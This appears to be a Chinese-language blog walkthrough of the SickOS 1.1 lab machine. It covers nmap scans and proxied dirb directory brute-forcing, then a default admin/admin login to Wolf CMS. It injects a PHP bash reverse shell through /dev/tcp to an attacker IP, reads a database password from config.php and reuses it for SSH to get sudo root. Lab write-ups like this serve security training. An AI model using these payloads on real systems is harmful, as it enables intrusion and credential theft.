nmap -sn 192.168.25.0/24
export ip=192.168.25.134
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 00:0C:29:C8:E0:D1 (VMware)
nmap -sT -sV -O -p22,3128,8080 $ip
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) 3128/tcp open http-proxy Squid http proxy 3.1.19 8080/tcp closed http-proxy MAC Address: 00:0C:29:C8:E0:D1 (VMware) Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.10 - 4.11 (92%), Linux 3.13 (91%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 3.10 (91%), Linux 3.2 - 3.10 (91%), Linux 3.2 - 3.16 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap -sU --top-port 20 192.168.25.134
PORT STATE SERVICE 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp 162/udp open|filtered snmptrap 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 514/udp open|filtered syslog 520/udp open|filtered route 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m 1900/udp open|filtered upnp 4500/udp open|filtered nat-t-ike 49152/udp open|filtered unknown
二、服务信息探查+目录探测(代理服务器的使用)
-
代理服务器怎么用
目录爆破啥都没有,那就去看代理服务器怎么使用
-p 参数 走http://192.168.25.134:3128/的代理去访问http://192.168.25.134
dirb http://192.168.25.134 -p http://192.168.25.134:3128/
---- Scanning URL: http://192.168.25.134/ ---- + http://192.168.25.134/cgi-bin/ (CODE:403|SIZE:290) + http://192.168.25.134/connect (CODE:200|SIZE:362) + http://192.168.25.134/index (CODE:200|SIZE:21) + http://192.168.25.134/index.php (CODE:200|SIZE:21) + http://192.168.25.134/robots (CODE:200|SIZE:45) + http://192.168.25.134/robots.txt (CODE:200|SIZE:45) + http://192.168.25.134/server-status (CODE:403|SIZE:295)
这些暴露出来的漏洞我们都可以再用漏扫工具去进行扫描
nikto 、 nmap
也可以通过代理服务器去访问80web端
三、Web服务页面访问
找/wolfcms,已经发现了目标使用的CMS
四、针对指定CMS进行渗透
当我们遇到一个CMS,我们首先想的就是管理路径能不能登录进去
也可以针对这个CMS,再进行目录爆破操作
dirb http://192.168.25.134/wolfcms -p http://192.168.25.134:3128/
---- Scanning URL: http://192.168.25.134/wolfcms/ ---- + http://192.168.25.134/wolfcms/composer (CODE:200|SIZE:403) + http://192.168.25.134/wolfcms/config (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.25.134/wolfcms/docs/ + http://192.168.25.134/wolfcms/favicon.ico (CODE:200|SIZE:894) + http://192.168.25.134/wolfcms/index (CODE:200|SIZE:3975) + http://192.168.25.134/wolfcms/index.php (CODE:200|SIZE:3975) ==> DIRECTORY: http://192.168.25.134/wolfcms/public/ + http://192.168.25.134/wolfcms/robots (CODE:200|SIZE:0) + http://192.168.25.134/wolfcms/robots.txt (CODE:200|SIZE:0)
找到文件泄露
http://192.168.25.134/wolfcms/public/
http://192.168.25.134/wolfcms/docs/
但是他的管理登录路径我们还没有发现,所以我们可以去网上搜索一下
五、初始权限(反弹Shell)
wolfcms admin path / wolfcms 管理员路径
http://192.168.25.134/wolfcms/?/admin/login
然后账号密码的话我们可以进行暴力破解或者搜索他的默认密码
这里随便输入 admin/admin 就进去了
当然我们可以去搜索引擎去搜默认密码,找不到就用弱密码字典去跑一下
可以发现页面中很多PHP代码
我们这里可以用PHP一句话代码到蚁剑、冰蝎里
也可以用php远程执行命令反弹bash的shell
这里我们用第二种
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'"); ?>
我们不知道哪个端口做了限制,因为这是黑盒,一般情况443比1234开的情况可能性更大,一个不行换另一个端口。
之后我们在Kali中建立监听
nc -nvlp 4444
然后我们再执行页面
点击页面的Archives就行了
六、本地提权
whoami
id
uname -a
ifconfig
lsb_release
ls -liah
cat config.php
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306'); define('DB_USER', 'root'); define('DB_PASS', 'john@123'); define('TABLE_PREFIX', '');
出现密码,但这个是数据库的密码账户
但有没有可能也是ssh的密码
cat /etc/passwd
发现sickos用户
我们尝试ssh登录
ssh sickos@192.168.25.134
密码 john@123
成功登录
id
sudo -l
这里是三个ALL说明已经是Root用户了
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/sickos1-1%e6%b3%95%e4%ba%8c/
共有 0 条评论